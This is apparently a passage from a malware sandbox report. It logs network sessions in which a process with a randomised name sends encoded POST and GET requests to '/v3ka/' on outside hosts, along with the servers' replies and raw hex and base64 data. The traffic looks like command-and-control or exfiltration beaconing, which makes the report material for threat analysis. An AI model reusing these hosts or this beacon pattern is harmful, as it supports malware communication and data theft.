8VAFtO5p4TVKqHj0AUW/jJ6/NnXhnKlDANnzkGqOK/CVzitmvfsXwaf1fqD6azuTwm2YDnMxsu1INQRb3fq6+9KD7TgtPsiqSdZCIVTBHdJnfAO6FWxuO8giqatTgyowJxJWpS59e4QJ1s3aA+RfIwlOwdgZ0MWfRFlf64cqdSXbFdUVDPAc3geHfFnTouTxYCMxdBLWhPt5XGU+T+bP91BLpnJRooxQIl7Ta+F+rEHB53UbY0gEWnLgvoaiJIBI/OOZajT9XJbYs8mEka8tc/0EvzpuWIlYs8QTPMzwC5w+Xq1qZVfYsx1Bi1dJnMrI6yuKUdKudgEbXH4yKC4YLkoMRTG+zMYp/DhYF9PK1j9q9dFmdaeZ2uM1SfYHIrNf2Khz9NeNpnQBeeH7mEOYkZ9f7d1aLEEy+QhjTQrw3qxWKuXRAlXGYq/l3Y+JZFuXrken5DD3BbWD8USniEnNNNxBsYCQDQrK8rGw+xL58vPMTALxSERY8JSQXvFYxr/HQrEriau7xHNjqSSvYC7deW00emWe8CPqvwWyTVUHPDMzJ/FhAbVCVtvocn1mqnU980Kl+073ziVxrHQatPaNYWF8n0sGHPPi0+hAZYoiPQXGID+NHlerbJf9BlKKT2RPwU5X2Bvr0Biw9vV0g9QYfpRuDT/kdeVXK4LNufaYIuPn9ElIDakbqWPvCE3bGRDcBLfj9+4RH3W2ZYU1ieQ+mnH31BLmGND4WBYj5RPFP3ZaLdoRHahbQstX6v04cZFMrJnu7wNUcCwly1DNpBxCiIBtWWKmV8uGCuYOh1KrmQarrCVvJgzl2rrjaadvmv5PQ/cF3YmhOoVmztbHaiLpzwx7+FmDqhXJYQ3EUhYN+SeUfOXcBbPuOa8u+NgR3GbVlVtvsv3KuKbLB9VVIaH3KpytkMkxfP1xG3WdrZqgxauGuI+o40/PV4yrEY3etMYYGTYUcxDtWg383O+4ctWYA/PruXu8gMSAQ13aX4gsCNUe4J3E1/hG8oXFIJVcoAfTiaHglc2yuKGqanVb2wQTuB0kIwK6pCSGNwrQrXBBEefop3cHgt2iZUQglZf0wpNZoOMfyRKtOCmdK/xR2cwEAoosuDuGH3tuTKzZgapeRTCCHcgmTAbo7NXVVZUpqUO9z2RCkeX8XEqv0H8gsvY4Tn7xDLyJjf9xjaiEkbK6IOc7rJvrpQ3UF/jVk7d/n7KBMISvGs8J/BuAipnDhqHOcGiet2cRsvHEL1eEygnMxIuvJVR6bTxgW9htnTibqX6XYSt4Gai5WOeN5WG5i5E9P7dG7YAjtd84vDzUUaoGfqj9mSQI7tC5YPXY88QqwR5sgqrnLuz2XDTdnGx0EN1i8mUyVcXmtPvLKY0YzCbo+nczNwqYUWJMyYBQA8uQe1DKQWjb4sDlYT6oe+sAPMRO2XUyFM2RBIc2oiit6vXQ/DjKTb8N158dvIwRsK2wh2thCj+7ZY36BtRmkOOstZxLxptYQ97NlgzFal0gv5X1G6cudWNKC4UXTvHjJJIL7NDVFxDDH8YOtkBuAwIvIO4G/gRhUUpThcqtytPekIN9zIqjtlRaDHXjccc2HDJf5hlnj1fgb3d/fy0MARhFzXd8SmJeKnr13dE0HklHT6BBc4ohAgd6bwU+cxAgVFGVTbvyNnULXdLoct0tEVgv38oSkSWNPgnOasAqgBRFI/guvEJ+lYqNYmONfkYIRcvQPkKozg3plAFdbl2W5D/SolufEvRAAl+F2g9k1hoZiQKJI2gV11s8dHJcyTuNK27Zc9Npwpa9wfnYJuxmJzJdb5P2WgWb0/CQD/BxDMzkk1RHY0GHDxIJrv7S0UvS7lt2fWXgdOqwZytpquOUjqjLGatVt0lfhim1COaOpVwlZrXn8uDfDJQ83VLV1NDCJc3jj7Ofo3WnbgX0Ag4wK7YspMirIZpz+i2UpwH8SCPFNZGhZyOO3MLmmVThuCwS7IS0LFx23JtPi9fqN/p+799tz1EK73mtX5XHRhfYoOGtProtRXLVHmbp5aMwO7sWc6e+IY+vNPaTAUu5ehbctJgCBfBRthtJQE7rmqMNh9JklJ2lUSFPO6Bhv1P5iuyN9OJdQxK/ozdXulG8r9r6Pif7WbdZXeiFQAh2n8dxUHnmHso0/PXR1f4WBpgQ/kld8tBO6yBoWQtiafwV8J9GrZ57pGFNaQWhgLdqISOoiS+CBRMeSsZFVM7xcuEJic76TXQ4zWsLIQlIvdX8wA5FOXyHY33a8haHrvknR+/VhJsJz3jH5sOPkAooNir3SqGQmw9HhDaDQc1M0lDGkyJt16ob8LLtQz8yVPsQCE1IZaowHfm4vF3Qw0vArFXr+la4/ej8yK1fTPCoyQ2NZUMGOQT5UjTXgmmttCjGPzkGNb6urBPWIr/TL6w2gB97pdGEG0PIecO5Dxz4+741FDPdsK7IQlqnNwrGViyfCUzPL9HH2nmBjYJIlRlscuLfShp1Pf3ljYt6uq1XC0Fj9rxBJUKho4f9V+QGdjRtwJahH001IaQTqRNIv5rOgdQRzss3LtucbR+skLndlRw8ZDLNBGYZ
Feb 28, 2024 15:47:12.254368067 CET	5144	OUT	Data Raw: 44 56 4e 44 48 49 75 74 68 57 59 44 32 4f 30 35 68 62 6c 63 44 41 6b 75 75 58 65 71 56 51 69 32 41 71 51 43 36 4d 55 48 4b 4a 66 4a 4c 4e 2f 67 76 7a 64 7a 54 33 56 6f 7a 55 35 65 45 70 43 51 41 44 65 65 69 6e 30 2f 2b 6e 76 53 57 65 49 30 46 6f Data Ascii: DVNDHIuthWYD2O05hblcDAkuuXeqVQi2AqQC6MUHKJfJLN/gvzdzT3VozU5eEpCQADeein0/+nvSWeI0Fo7ZN30DqF7a5EkbTL9g13ao2sq7kOtJiOY4YMRONY5juCUMiO6wr90SFfn4p8Ecsefe78jGjm0RmqsnkfBwaq/zeVcXUq06wXTbrEzu3pFtsEC5bZdl6kx7CPeNFj2i+2/GdcHPIGJ3SzcKaaJNvLz/OS7cIr/TCF6
Feb 28, 2024 15:47:12.587393999 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 28 Feb 2024 14:47:12 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Feb 28, 2024 15:47:12.587474108 CET	2572	OUT	Data Raw: 56 45 4a 50 38 47 37 69 7a 70 37 6b 76 4c 6c 62 75 67 73 67 61 6d 51 2f 79 31 73 4b 42 34 51 72 4d 51 77 44 54 36 74 69 62 49 33 52 35 34 37 64 39 62 31 62 50 78 43 64 69 55 79 67 33 6a 6d 45 6e 49 45 67 41 5a 4d 52 4b 78 69 63 4a 4d 47 72 2f 70 Data Ascii: VEJP8G7izp7kvLlbugsgamQ/y1sKB4QrMQwDT6tibI3R547d9b1bPxCdiUyg3jmEnIEgAZMRKxicJMGr/p/nJ/D55uOftAyhqcYVo8z+tp3WvNbOXgDoV/JbI/x1RpkEuhzU9XfdgHcK4rRx5OJGeB0oCMjRjxgVpBQN/ZxFPlvQOxCvPCjSscK4iy82lHZQzelncnCVwRIz4FPKSywupVKrwUv0AUyZzP2ven0LaspQffof8fD
Feb 28, 2024 15:47:12.587640047 CET	2572	OUT	Data Raw: 43 46 78 6b 35 6f 67 4d 59 79 7a 79 47 46 57 58 59 78 74 62 37 48 78 2f 67 35 64 37 59 38 71 64 74 54 4e 70 78 61 48 35 57 4f 6e 66 6b 62 6c 61 6b 57 4e 45 4e 54 4e 55 63 4e 50 46 73 49 73 71 35 49 49 6f 61 51 79 6e 6e 73 49 45 6a 32 6a 77 4d 78 Data Ascii: CFxk5ogMYyzyGFWXYxtb7Hx/g5d7Y8qdtTNpxaH5WOnfkblakWNENTNUcNPFsIsq5IIoaQynnsIEj2jwMxkDwC2ubLjcU3jyu0ChOsQLJBceUIQgLwxhoF/KgI58YpRbVo2Vs3cMDdSIFe3tDPhz+cTK+2vV8noZJ8LpSzkWjnlXdJrHY6nSnmO4e0QJ0gwwuGNro9bqsawpfra8LI03ve4/L0C/ep+aJpJR82SDZYv6BW9YXpR
Feb 28, 2024 15:47:12.587810993 CET	10288	OUT	Data Raw: 45 6e 5a 4d 66 55 57 38 61 71 63 76 35 4b 48 70 4e 77 79 36 41 48 7a 32 4e 6e 59 45 52 4b 4e 37 52 75 6f 58 39 63 45 71 79 4a 44 69 4d 30 68 34 4e 37 61 75 78 34 4d 58 47 39 2f 69 6e 4f 74 71 4b 76 70 50 34 7a 52 43 78 57 45 63 63 62 71 53 78 49 Data Ascii: EnZMfUW8aqcv5KHpNwy6AHz2NnYERKN7RuoX9cEqyJDiM0h4N7aux4MXG9/inOtqKvpP4zRCxWEccbqSxIoXNeg5L/VK2G0oRTUfzuYXK0UcmvLVuvXo25MA8KvFaZ62yhjQP4e2WbBmXayjZimUuFmMkmczX7HQSFVjP7f3+PTq16wHMJun2INWqKq8sBFy/ZhQYn1iZMhMqO0Pfe74W6X5w4RFPeUTYrQNAbSty8kgLk9DeOU
Feb 28, 2024 15:47:12.587994099 CET	2572	OUT	Data Raw: 6c 6b 58 47 4b 44 57 56 67 30 71 68 6f 49 38 4f 34 4d 6b 72 6f 58 5a 54 54 50 43 63 75 44 34 6a 51 31 4a 70 37 59 78 57 30 62 30 59 4c 63 68 64 2f 79 72 4b 51 39 65 57 55 45 65 4f 6f 79 32 58 75 74 58 37 50 33 4d 6f 65 34 76 69 61 52 57 6e 6c 4b Data Ascii: lkXGKDWVg0qhoI8O4MkroXZTTPCcuD4jQ1Jp7YxW0b0YLchd/yrKQ9eWUEeOoy2XutX7P3Moe4viaRWnlKWmdhuubiXbFfeI9z/F3sfj1SgE4P2FBD14S6LJKc4afFRX24SKe1oBmicZOJEtrj1cJ+WOpmftt5oLBBoLNz/jEDhx65ad7tBmuFFZG+v5pNOoZgiFMzC20FSAAbS3UB/hwqwtws/Nj1FTAnzLJIIJ7arxpQH0UM0
Feb 28, 2024 15:47:12.588121891 CET	7716	OUT	Data Raw: 37 78 42 56 6f 4f 4f 68 73 75 66 6e 6f 6d 71 32 4e 4c 30 47 2f 57 54 61 56 46 53 7a 52 70 42 75 69 36 47 58 7a 66 33 48 37 4d 49 43 32 58 6e 36 45 50 51 39 75 4e 4a 63 62 6a 47 41 52 49 55 6f 71 2f 54 57 4b 66 2f 53 69 30 31 52 41 4d 49 44 66 2b Data Ascii: 7xBVoOOhsufnomq2NL0G/WTaVFSzRpBui6GXzf3H7MIC2Xn6EPQ9uNJcbjGARIUoq/TWKf/Si01RAMIDf+pdzgoHeR+7CpXVDLJGE+x8Y+xfHtIdVUHvqU7qTE9eEgbR74tzjSp/+IGq9uwSdR/rUrrq1NMD0w/RXs85sABvdRJMCGlVV9VrMBylgO0Dc0QdceGN5Q+b3GVHLop3B+YRw3AcsNZ6xtSClQWWGAiRtazOKdFMKJy
Feb 28, 2024 15:47:12.911248922 CET	2572	OUT	Data Raw: 6e 35 77 74 75 2b 73 52 43 50 6e 7a 51 49 56 2f 74 4d 38 43 58 65 7a 45 44 73 42 2f 5a 6e 44 30 72 77 6c 37 79 45 49 4e 43 66 54 53 68 50 2b 66 76 5a 4a 55 77 59 38 57 5a 51 55 6e 6b 42 4d 48 6f 6c 48 52 50 58 4b 46 34 4a 6f 61 57 44 65 6d 5a 48 Data Ascii: n5wtu+sRCPnzQIV/tM8CXezEDsB/ZnD0rwl7yEINCfTShP+fvZJUwY8WZQUnkBMHolHRPXKF4JoaWDemZHqoOeZTD3TZu+jR31dYbhgY/5F7xomb8rQGzLeGMQgR5kyRZh1hXs7nVCgZYWUkwto1JZvKA4Dj46AcoZbDzHE1Jw7mRuTVZOy2yR8ZMg7xwNivUF0/EZP7R+bqQmbEblLmXW5kIntzdP+BZnu1jvkflmOpXW/EJZ0
Feb 28, 2024 15:47:12.911425114 CET	9002	OUT	Data Raw: 4e 64 6b 59 57 72 7a 45 43 42 4a 43 43 76 54 4c 48 66 2f 53 6e 67 6f 39 75 61 54 55 77 34 61 4f 50 42 5a 53 55 6d 41 47 2f 52 32 66 7a 4c 6c 4e 64 43 65 53 67 31 59 39 34 6c 67 48 48 62 7a 49 39 71 48 6f 47 6b 50 59 44 50 75 4c 68 30 32 69 48 66 Data Ascii: NdkYWrzECBJCCvTLHf/Sngo9uaTUw4aOPBZSUmAG/R2fzLlNdCeSg1Y94lgHHbzI9qHoGkPYDPuLh02iHf9m5yi3lPTB/HwK6nmT0umn3m+Q/NXw3Z7h3FPNetiY7BD6uJSFEA8m/QDJnSv0/dADrSWQS62crAU8nE9e4JoytZJJ9J1a0Df/Bqu8ywhEPA3AuOaOg3fr9y/JA4yt0svguH6lam5ILfYUjGqvPcSUN3B5stSIHnF
Feb 28, 2024 15:47:12.911561966 CET	3310	OUT	Data Raw: 62 47 59 49 33 44 2f 69 4c 4b 57 37 75 75 49 42 2b 4a 55 43 55 30 53 5a 79 4e 2f 37 57 77 66 38 66 56 70 79 58 6b 54 61 41 34 4b 48 4c 37 61 30 6c 4b 69 35 35 45 37 35 54 6c 51 59 36 2b 2f 53 6c 33 75 46 6f 31 49 45 73 46 72 39 39 68 35 50 6d 32 Data Ascii: bGYI3D/iLKW7uuIB+JUCU0SZyN/7Wwf8fVpyXkTaA4KHL7a0lKi55E75TlQY6+/Sl3uFo1IEsFr99h5Pm2OAgrjsgl9QccqfcPcHj8uusQZaTKVAM96P+J5Rrb5QJG0NIxN9za7042zKk7iLVmYEKAgT2Uvb8oHh7Mc4jzzL51O22vbWkgYCTuUIW/E2hHJcqvJXFoEETICYyru4mb75gvXfSg78uNCEQFuZY7i0ZVVjFq90euM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.11.20	50263	103.146.179.172	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:47:15.087985992 CET	462	OUT	GET /v3ka/?nf8dPP8p=TQDhdygg/6k1FrT4Y+Ji1OABi/Pr0Fm2MLjtTeKUejKDGRun2D/B3i3kqoFCSoO3Pw/E65XWfWwoO6YHx8j54r/FSG1v4bIQ+pjQtEt8fQcNNLpktl01Hso=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.kmyangjia.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:47:15.400135994 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 28 Feb 2024 14:47:15 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.11.20	50264	109.234.166.81	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:47:21.322045088 CET	754	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.globalworld-travel.com Origin: http://www.globalworld-travel.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.globalworld-travel.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 49 72 71 59 66 62 78 54 4a 4e 64 63 45 69 2f 6d 74 78 35 7a 48 76 6f 32 7a 48 50 53 34 6e 2b 54 56 66 4f 7a 42 6a 4a 49 6b 48 4d 70 6a 54 48 31 2f 4e 50 77 4b 49 44 31 77 5a 2f 55 58 57 54 33 57 53 6f 4c 73 66 53 7a 54 43 2b 70 39 63 68 41 7a 76 68 61 54 58 45 55 30 53 48 64 4c 54 76 36 41 48 72 46 6c 6a 45 70 55 53 4b 34 32 63 45 34 61 54 53 2f 64 39 31 43 76 70 6e 30 65 34 31 4e 68 65 58 44 2f 44 51 43 4a 4e 7a 42 32 4d 4d 63 77 64 42 42 2f 68 59 32 4b 47 65 69 65 52 68 47 58 35 77 6d 6a 50 55 34 4e 64 68 72 52 53 78 56 6b 4f 4a 53 6e 35 61 4f 54 32 63 59 72 42 75 79 63 41 3d 3d Data Ascii: nf8dPP8p=IrqYfbxTJNdcEi/mtx5zHvo2zHPS4n+TVfOzBjJIkHMpjTH1/NPwKID1wZ/UXWT3WSoLsfSzTC+p9chAzvhaTXEU0SHdLTv6AHrFljEpUSK42cE4aTS/d91Cvpn0e41NheXD/DQCJNzB2MMcwdBB/hY2KGeieRhGX5wmjPU4NdhrRSxVkOJSn5aOT2cYrBuycA==
Feb 28, 2024 15:47:21.636750937 CET	678	IN	HTTP/1.1 307 Temporary Redirect Date: Wed, 28 Feb 2024 14:47:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 expires: Thu, 01 Jan 1970 00:00:01 GMT referer-policy: same-origin set-cookie: o2s-chl=e522bf5b7b0b1bf913e2fd6f784de0ac; domain=.globalworld-travel.com; expires=Thu, 29-Feb-24 14:47:22 GMT; path=/; SameSite=Lax; HttpOnly location: http://www.globalworld-travel.com/v3ka/ tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect Server: o2switch-PowerBoost-v3 Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.11.20	50265	109.234.166.81	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:47:24.168030024 CET	1094	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.globalworld-travel.com Origin: http://www.globalworld-travel.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.globalworld-travel.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 49 72 71 59 66 62 78 54 4a 4e 64 63 46 47 37 6d 76 51 35 7a 4c 66 6f 78 38 6e 50 53 68 33 2b 58 56 66 53 7a 42 69 4e 59 6b 30 6b 70 67 79 58 31 78 73 50 77 4c 49 44 31 6f 4a 2f 56 5a 32 53 37 57 53 55 70 73 62 61 7a 54 42 43 70 39 75 70 41 33 76 68 46 4c 6e 45 62 69 43 48 59 63 44 76 77 41 48 6e 2f 6c 69 41 70 55 69 6d 34 33 65 63 34 64 43 53 77 4b 4e 31 45 36 35 6e 37 48 6f 31 71 68 65 61 2b 2f 44 59 30 4a 2f 76 42 33 76 45 63 78 64 42 43 31 52 59 50 43 6d 66 67 59 55 41 4d 57 35 56 62 76 59 38 63 4e 4d 52 31 5a 41 5a 79 39 74 74 39 36 59 33 33 58 33 4a 6b 68 41 2f 75 4a 42 36 36 79 33 2f 78 62 34 62 39 78 6b 76 5a 71 38 44 66 5a 30 30 47 4e 30 6f 33 6f 31 39 6e 4d 55 58 71 64 6f 55 64 33 51 5a 63 63 47 61 68 54 76 37 66 44 62 65 4f 4c 62 62 4b 72 53 57 30 37 45 73 77 76 48 51 73 75 4d 41 2f 39 57 36 57 78 43 41 7a 6f 73 49 54 69 73 52 49 53 38 55 56 4b 2b 44 49 53 4e 6b 69 78 58 45 47 47 4d 4a 44 6c 46 53 34 61 48 35 74 36 73 61 52 48 39 56 55 35 52 7a 50 59 48 74 43 61 34 53 64 6c 37 7a 67 43 7a 78 47 2b 35 58 77 6d 6d 55 63 4e 6c 72 74 4c 39 52 2b 43 77 6d 35 4b 4a 46 6e 64 50 30 74 4a 6f 42 38 62 42 43 64 59 31 34 45 64 31 54 78 62 46 52 58 4d 42 43 73 77 45 31 56 73 52 55 6a 4e 68 4b 36 52 36 2f 37 51 52 6f 6a 62 54 64 55 32 4e 48 6f 54 2f 50 70 5a 66 4e 78 59 4c 61 53 57 54 34 41 63 2b 68 39 52 59 7a 4f 4d 6c 6f 54 44 75 4e 54 37 4f 6f 51 2b 62 66 55 35 70 4e 63 4c 70 47 62 41 72 4d 45 75 6e 6c 70 34 30 30 46 35 6c 61 36 59 45 6f 54 70 43 33 46 34 39 6a 33 72 44 46 56 45 4b 79 75 51 77 6b 66 37 62 72 68 50 38 39 61 6a 50 57 65 65 4c 6c 30 72 4a 6a 47 4b 59 79 6f 39 68 55 3d Data Ascii: nf8dPP8p=IrqYfbxTJNdcFG7mvQ5zLfox8nPSh3+XVfSzBiNYk0kpgyX1xsPwLID1oJ/VZ2S7WSUpsbazTBCp9upA3vhFLnEbiCHYcDvwAHn/liApUim43ec4dCSwKN1E65n7Ho1qhea+/DY0J/vB3vEcxdBC1RYPCmfgYUAMW5VbvY8cNMR1ZAZy9tt96Y33X3JkhA/uJB66y3/xb4b9xkvZq8DfZ00GN0o3o19nMUXqdoUd3QZccGahTv7fDbeOLbbKrSW07EswvHQsuMA/9W6WxCAzosITisRIS8UVK+DISNkixXEGGMJDlFS4aH5t6saRH9VU5RzPYHtCa4Sdl7zgCzxG+5XwmmUcNlrtL9R+Cwm5KJFndP0tJoB8bBCdY14Ed1TxbFRXMBCswE1VsRUjNhK6R6/7QRojbTdU2NHoT/PpZfNxYLaSWT4Ac+h9RYzOMloTDuNT7OoQ+bfU5pNcLpGbArMEunlp400F5la6YEoTpC3F49j3rDFVEKyuQwkf7brhP89ajPWeeLl0rJjGKYyo9hU=
Feb 28, 2024 15:47:24.487358093 CET	678	IN	HTTP/1.1 307 Temporary Redirect Date: Wed, 28 Feb 2024 14:47:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 expires: Thu, 01 Jan 1970 00:00:01 GMT referer-policy: same-origin set-cookie: o2s-chl=e522bf5b7b0b1bf913e2fd6f784de0ac; domain=.globalworld-travel.com; expires=Thu, 29-Feb-24 14:47:25 GMT; path=/; SameSite=Lax; HttpOnly location: http://www.globalworld-travel.com/v3ka/ tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect Server: o2switch-PowerBoost-v3 Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.11.20	50266	109.234.166.81	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:47:27.007545948 CET	2572	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.globalworld-travel.com Origin: http://www.globalworld-travel.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.globalworld-travel.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 49 72 71 59 66 62 78 54 4a 4e 64 63 46 47 37 6d 76 51 35 7a 4c 66 6f 78 38 6e 50 53 68 33 2b 58 56 66 53 7a 42 69 4e 59 6b 79 38 70 6a 41 50 31 78 4c 7a 77 61 34 44 31 32 5a 2f 59 5a 32 53 32 57 57 41 74 73 62 58 4f 54 45 47 70 38 39 39 41 69 4b 56 46 4f 6e 45 61 73 69 48 65 4c 54 76 6b 41 48 72 4e 6c 69 46 53 55 53 53 34 32 64 30 34 61 31 75 2f 4a 64 31 43 36 35 6e 6e 44 6f 31 59 68 65 4f 55 2f 43 6b 30 4a 39 62 42 33 64 38 63 39 75 70 43 38 68 59 49 49 47 66 56 53 30 41 31 57 35 51 71 76 59 39 72 4e 4e 6c 31 5a 44 68 79 36 63 74 2b 35 34 33 33 4c 48 4a 6e 6c 41 7a 71 4a 42 32 69 79 33 37 78 62 2f 66 39 6a 55 76 5a 68 39 44 51 4a 6b 30 41 4a 30 6f 61 69 56 78 52 4d 55 71 5a 64 70 77 64 33 41 4e 63 64 31 43 68 41 39 44 66 41 37 65 4d 50 62 62 6a 68 79 57 6f 37 45 38 47 76 48 78 5a 75 50 4d 2f 76 45 43 57 7a 67 35 6c 2b 63 49 56 2b 38 51 63 44 73 59 77 4b 2b 53 4a 53 4e 6b 79 78 53 30 47 48 39 5a 44 6b 41 6d 35 64 58 35 71 32 4d 62 4c 4d 64 5a 4f 35 52 76 58 59 45 73 48 61 37 2b 64 71 37 7a 67 4a 79 78 4a 30 4a 58 33 74 47 56 52 44 46 72 45 4c 39 64 59 43 30 65 70 4c 35 5a 6e 63 2f 6b 74 61 49 42 2f 4b 52 43 5a 57 56 35 50 4d 6c 54 78 62 46 4d 6b 4d 42 4f 73 77 55 4e 56 71 68 6b 6a 63 53 79 36 54 36 2f 35 51 52 70 39 62 54 51 6b 32 4e 2f 53 54 2f 65 47 5a 5a 56 78 66 61 4b 53 58 57 4d 48 61 4f 68 34 41 49 7a 6a 49 6c 6c 46 44 74 34 65 37 4e 51 75 35 74 58 55 34 70 64 63 59 35 47 59 4b 72 4e 4f 6e 48 6c 42 38 30 34 5a 35 6c 48 43 59 48 30 6c 70 41 33 46 39 6f 58 68 30 77 74 49 46 62 4b 75 58 67 34 46 34 49 50 66 4d 4e 78 32 72 75 57 2f 63 2b 46 77 6b 36 54 54 64 34 53 35 6c 42 2f 2f 48 33 59 4a 76 39 46 31 56 54 32 4b 56 76 37 68 6f 77 57 6a 48 43 4b 35 41 46 66 70 66 69 6e 31 69 65 34 72 73 45 67 63 32 76 35 71 45 57 6b 61 36 77 67 59 38 41 6d 76 4c 7a 64 73 69 6a 67 6b 77 79 74 41 55 5a 6c 42 6b 33 54 4f 58 65 51 47 6a 49 39 36 44 7a 4c 37 39 47 4c 67 49 72 68 65 6b 79 6f 70 76 6e 48 63 55 50 4e 66 70 66 69 2b 58 58 64 6f 49 4a 4a 33 76 65 46 52 71 66 4f 79 68 47 77 5a 69 37 69 56 75 35 30 77 51 64 2f 57 65 63 48 35 48 45 39 61 57 53 65 6c 65 61 6c 51 4e 6a 7a 4c 51 48 4e 62 4f 52 4c 55 47 47 30 63 34 6c 6c 4c 53 52 43 61 45 5a 7a 41 61 58 7a 35 74 6b 38 56 4e 34 37 4a 58 76 45 77 33 45 4c 6e 64 64 44 63 2b 6d 67 77 70 43 54 67 4e 68 59 63 5a 51 42 6d 71 73 7a 34 72 6b 71 77 72 33 45 35 56 66 56 79 61 31 4d 42 55 75 54 51 65 48 77 41 79 73 39 6d 55 30 55 48 41 54 32 52 72 6f 54 52 41 68 79 4e 4e 52 53 51 34 62 33 30 46 43 75 56 38 63 65 31 2f 6d 46 77 6f 4e 71 79 61 31 63 53 47 37 75 73 35 49 6a 55 69 71 4f 6f 79 53 72 61 4d 44 6d 54 7a 76 61 43 38 58 57 4c 34 47 57 6d 46 33 63 39 44 45 53 62 4c 71 32 5a 72 47 61 6d 62 4d 36 5a 2b 35 45 30 33 51 4f 4a 68 42 70 2f 4e 4c 69 42 69 4e 2f 65 48 68 63 6d 30 70 73 53 33 63 79 38 46 35 48 63 71 74 76 66 2b 75 52 64 79 78 4a 52 45 